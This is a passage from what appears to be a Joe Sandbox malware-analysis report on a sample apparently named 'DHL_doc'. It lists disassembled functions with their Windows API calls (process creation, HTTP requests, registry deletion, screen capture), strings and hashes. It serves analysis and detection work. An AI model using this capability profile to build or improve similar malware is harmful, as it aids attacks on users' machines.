CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F4B3B6
GetLastError.KERNEL32(00000000), ref: 00F4B407
CloseHandle.KERNEL32(?), ref: 00F4B439
CloseHandle.KERNEL32(00000000), ref: 00F4B44A
CloseHandle.KERNEL32(00000000), ref: 00F4B45C
CloseHandle.KERNEL32(00000000), ref: 00F4B46E
CloseHandle.KERNEL32(?), ref: 00F4B4E3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 6625c582d5b2b3a86d3707b0c358d6de05cc9204f53bcddea314273cee2d828d
Instruction ID: df38287776780252d8a62fae6eb44ad09565eea8c1da359816b21d48d020ff7d
Opcode Fuzzy Hash: 6625c582d5b2b3a86d3707b0c358d6de05cc9204f53bcddea314273cee2d828d
Instruction Fuzzy Hash: B0F1AF31908340DFC714EF24C891B6EBBE5AF85324F14855DF89A9B2A2DB31EC45DB92

Function 00EC326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00F91990), ref: 00F02F8D
GetMenuItemCount.USER32(00F91990), ref: 00F0303D
GetCursorPos.USER32(?), ref: 00F03081
SetForegroundWindow.USER32(00000000), ref: 00F0308A
TrackPopupMenuEx.USER32(00F91990,00000000,?,00000000,00000000,00000000), ref: 00F0309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F030A9

Strings

0, xrefs: 00EC327D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 5da8caed176d4b00795beab1d1440f056add468e130a8168be7bb1a969b4c170
Instruction ID: e1a0f0c506a91c359af28f182248df8750bdb85b058f55b4fd9458593d7146f6
Opcode Fuzzy Hash: 5da8caed176d4b00795beab1d1440f056add468e130a8168be7bb1a969b4c170
Instruction Fuzzy Hash: 90711A71A44316BEFB258F64DD49F9ABF68FF04364F204216FA156A1E0C7B1A910F790

Function 00F56CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00F56DEB

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F56E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F56E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F56E94
DestroyWindow.USER32(?), ref: 00F56EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EC0000,00000000), ref: 00F56EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F56EFD
GetDesktopWindow.USER32 ref: 00F56F16
GetWindowRect.USER32(00000000), ref: 00F56F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F56F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F56F4D

Part of subcall function 00ED9944: GetWindowLongW.USER32(?,000000EB), ref: 00ED9952

Strings

tooltips_class32, xrefs: 00F56E58, 00F56EDD
0, xrefs: 00F56D98

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 6e5a9b45c33357b88ae5b605f28e71417c99b176a31dea28cb1169af0b3925cb
Instruction ID: 250a90b7dc057e95143582ba35d5e18c1e84f12a9178b935a66ec1b3a8d889e9
Opcode Fuzzy Hash: 6e5a9b45c33357b88ae5b605f28e71417c99b176a31dea28cb1169af0b3925cb
Instruction Fuzzy Hash: 65718870904344AFDB21CF18D844FAABBE9FB89315F44051EFA99D7260D730E90AEB11

Function 00F5911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

DragQueryPoint.SHELL32(?,?), ref: 00F59147

Part of subcall function 00F57674: ClientToScreen.USER32(?,?), ref: 00F5769A
Part of subcall function 00F57674: GetWindowRect.USER32(?,?), ref: 00F57710
Part of subcall function 00F57674: PtInRect.USER32(?,?,00F58B89), ref: 00F57720

SendMessageW.USER32(?,000000B0,?,?), ref: 00F591B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F591BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F591DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F59225
SendMessageW.USER32(?,000000B0,?,?), ref: 00F5923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00F59255
SendMessageW.USER32(?,000000B1,?,?), ref: 00F59277
DragFinish.SHELL32(?), ref: 00F5927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F59371

Strings

@GUI_DRAGID, xrefs: 00F592E9
@GUI_DROPID, xrefs: 00F5929E
@GUI_DRAGFILE, xrefs: 00F59320

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 2237b263d853d630216ed973eb2b5a5a569178037542a9bc8945f1dce094e608
Instruction ID: 2a9313c2fc25a720b97a39b60e76da5d3084ecbd576809ce2aa8b040eff1da58
Opcode Fuzzy Hash: 2237b263d853d630216ed973eb2b5a5a569178037542a9bc8945f1dce094e608
Instruction Fuzzy Hash: E861A071108305AFD705DF50DC85EAFBBE8EF89350F10092DF696931A1DB719A09DB92

Function 00F3C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F3C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F3C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F3C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F3C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F3C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F3C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F3C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F3C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F3C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F3C5F0
InternetCloseHandle.WININET(00000000), ref: 00F3C5FB

Strings

, xrefs: 00F3C575

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 6238fe2b8ba240b3303696f04507e13908e550f243c4fbc2e8df3bc69835faa4
Instruction ID: a81f56986d2cd08595b071504c4652c9abcb49ace3406de5c06c594c18d351d7
Opcode Fuzzy Hash: 6238fe2b8ba240b3303696f04507e13908e550f243c4fbc2e8df3bc69835faa4
Instruction Fuzzy Hash: D6514AB1500309BFDB219F60DD88AAB7BBCFF08765F044419FA46A6610DB34E944EBA0

Function 00F5856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F58592
GetFileSize.KERNEL32(00000000,00000000), ref: 00F585A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F585AD
CloseHandle.KERNEL32(00000000), ref: 00F585BA
GlobalLock.KERNEL32(00000000), ref: 00F585C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F585D7
GlobalUnlock.KERNEL32(00000000), ref: 00F585E0
CloseHandle.KERNEL32(00000000), ref: 00F585E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F585F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F5FC38,?), ref: 00F58611
GlobalFree.KERNEL32(00000000), ref: 00F58621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00F58641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00F58671
DeleteObject.GDI32(00000000), ref: 00F58699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F586AF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 78e92b29ac9b40b60227dfa112ec9fafa32ac4e7ce2489febbc893055341ec1c
Instruction ID: d1c2bc9493d6512ca2111bd0fc704791251250330a59a4789cf2365fd6615691
Opcode Fuzzy Hash: 78e92b29ac9b40b60227dfa112ec9fafa32ac4e7ce2489febbc893055341ec1c
Instruction Fuzzy Hash: 5A41FC75600308AFDB11DF65DC48EAA7BB8EF89762F144058FA06E7250DB309D45EF60

Function 00F314BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00F31502
VariantCopy.OLEAUT32(?,?), ref: 00F3150B
VariantClear.OLEAUT32(?), ref: 00F31517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F315FB
VarR8FromDec.OLEAUT32(?,?), ref: 00F31657
VariantInit.OLEAUT32(?), ref: 00F31708
SysFreeString.OLEAUT32(?), ref: 00F3178C
VariantClear.OLEAUT32(?), ref: 00F317D8
VariantClear.OLEAUT32(?), ref: 00F317E7
VariantInit.OLEAUT32(00000000), ref: 00F31823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00F31625
Default, xrefs: 00F316AF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: d993b37c04e9841189d57310ae8a43d1c9ec9c8f273ac21c72f9dd3ede9d5ada
Instruction ID: 531a95886d1cbbba70525d4a2ef2202145ad8ddc361dc7462dcc5d6ecfba6cd0
Opcode Fuzzy Hash: d993b37c04e9841189d57310ae8a43d1c9ec9c8f273ac21c72f9dd3ede9d5ada
Instruction Fuzzy Hash: 59D1F132A00205DBDB50DF65E885B7DB7F5FF44720F18845AE806AB280DB30DD46EBA1

Function 00F4B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4B6AE,?,?), ref: 00F4C9B5
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4C9F1
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4CA68
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F4B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F4B772
RegDeleteValueW.ADVAPI32(?,?), ref: 00F4B80A
RegCloseKey.ADVAPI32(?), ref: 00F4B87E
RegCloseKey.ADVAPI32(?), ref: 00F4B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F4B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F4B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00F4B922
FreeLibrary.KERNEL32(00000000), ref: 00F4B983
RegCloseKey.ADVAPI32(00000000), ref: 00F4B994

Strings

advapi32.dll, xrefs: 00F4B8ED
RegDeleteKeyExW, xrefs: 00F4B8FE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: f7c806e7a816b0954cdececaea8b5c3c90759fc5e25ca9416125b1006f41de9e
Instruction ID: a025ad6fc889d6ef7de30cd4841014bbf459b0ac742f06f4251bc18308164ca6
Opcode Fuzzy Hash: f7c806e7a816b0954cdececaea8b5c3c90759fc5e25ca9416125b1006f41de9e
Instruction Fuzzy Hash: D5C19C31608301AFD714DF14C494F2ABBE5BF84318F18945CE99A9B2A3CB36EC46DB81

Function 00F4255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F425D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F425E8
CreateCompatibleDC.GDI32(?), ref: 00F425F4
SelectObject.GDI32(00000000,?), ref: 00F42601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F4266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F426AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F426D0
SelectObject.GDI32(?,?), ref: 00F426D8
DeleteObject.GDI32(?), ref: 00F426E1
DeleteDC.GDI32(?), ref: 00F426E8
ReleaseDC.USER32(00000000,?), ref: 00F426F3

Strings

(, xrefs: 00F4268D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7f5e48984e4559954fd99a0490c1a9915116231270d882a3b712ab14fff0aadd
Instruction ID: 7438fc6a9b7dbc3c6f3ed848a05dd92a9cd93da3a283876f41c977f061514911
Opcode Fuzzy Hash: 7f5e48984e4559954fd99a0490c1a9915116231270d882a3b712ab14fff0aadd
Instruction Fuzzy Hash: 9761D175D00219EFCF04CFA8D884AAEBBB5FF48310F208529EA56A7250D774A951DF90

Function 00EFDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00EFDAA1

Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD659
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD66B
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD67D
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD68F
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD6A1
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD6B3
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD6C5
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD6D7
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD6E9
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD6FB
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD70D
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD71F
Part of subcall function 00EFD63C: _free.LIBCMT ref: 00EFD731

_free.LIBCMT ref: 00EFDA96

Part of subcall function 00EF29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000), ref: 00EF29DE
Part of subcall function 00EF29C8: GetLastError.KERNEL32(00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000,00000000), ref: 00EF29F0

_free.LIBCMT ref: 00EFDAB8
_free.LIBCMT ref: 00EFDACD
_free.LIBCMT ref: 00EFDAD8
_free.LIBCMT ref: 00EFDAFA
_free.LIBCMT ref: 00EFDB0D
_free.LIBCMT ref: 00EFDB1B
_free.LIBCMT ref: 00EFDB26
_free.LIBCMT ref: 00EFDB5E
_free.LIBCMT ref: 00EFDB65
_free.LIBCMT ref: 00EFDB82
_free.LIBCMT ref: 00EFDB9A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: fc1dcdc13bf40d8c9f39d5f3955807bbbcdc9494d7137152dc43b76e4d006ad7
Instruction ID: 01a991948c193e4fe60bdc537c67ee51afc55b46b258cd3e7c2ba84e5e031e72
Opcode Fuzzy Hash: fc1dcdc13bf40d8c9f39d5f3955807bbbcdc9494d7137152dc43b76e4d006ad7
Instruction Fuzzy Hash: 82315A3164860E9FEB22AE38EC45B7A7BEAFF40315F11651DE648E7191DB71EC408724

Function 00F2365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F2369C
_wcslen.LIBCMT ref: 00F236A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F23797
GetClassNameW.USER32(?,?,00000400), ref: 00F2380C
GetDlgCtrlID.USER32(?), ref: 00F2385D
GetWindowRect.USER32(?,?), ref: 00F23882
GetParent.USER32(?), ref: 00F238A0
ScreenToClient.USER32(00000000), ref: 00F238A7
GetClassNameW.USER32(?,?,00000100), ref: 00F23921
GetWindowTextW.USER32(?,?,00000400), ref: 00F2395D

Strings

%s%u, xrefs: 00F23734

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 7a558765d8e8bdad8162ced7337f7f93dd3c76928994ea1c0a135ebc1ee3b92f
Instruction ID: ed6d6f2267884f78d8d981bb4acc27e1bc7add0cecc7911ff94f1246ce01fdb5
Opcode Fuzzy Hash: 7a558765d8e8bdad8162ced7337f7f93dd3c76928994ea1c0a135ebc1ee3b92f
Instruction Fuzzy Hash: B591E3B160431AAFD708DF24D884FEAB7E9FF44310F004529F99AD6190DB38EA45DB91

Function 00F24954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00F24994
GetWindowTextW.USER32(?,?,00000400), ref: 00F249DA
_wcslen.LIBCMT ref: 00F249EB
CharUpperBuffW.USER32(?,00000000), ref: 00F249F7
_wcsstr.LIBVCRUNTIME ref: 00F24A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00F24A64
GetWindowTextW.USER32(?,?,00000400), ref: 00F24A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00F24AE6
GetClassNameW.USER32(?,?,00000400), ref: 00F24B20
GetWindowRect.USER32(?,?), ref: 00F24B8B

Strings

ThumbnailClass, xrefs: 00F24A6F, 00F24AF1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: b70e75bae5d3492d135c6fbb86301cf3f90d7a44dd590c343a4e12d19254717b
Instruction ID: 67afce746b2e96ff11d6bc5118996294cbc56e98c535248ad430edccd795d696
Opcode Fuzzy Hash: b70e75bae5d3492d135c6fbb86301cf3f90d7a44dd590c343a4e12d19254717b
Instruction Fuzzy Hash: FF91D0324043199FDB04CF14E985FAA77E8FF84324F048469FD859A096DBB4ED45DBA1

Function 00F4CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F4CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F4CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F4CD48

Part of subcall function 00F4CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F4CCAA
Part of subcall function 00F4CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F4CCBD
Part of subcall function 00F4CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F4CCCF
Part of subcall function 00F4CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F4CD05
Part of subcall function 00F4CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F4CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F4CCF3

Strings

advapi32.dll, xrefs: 00F4CCB8
RegDeleteKeyExW, xrefs: 00F4CCC9

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
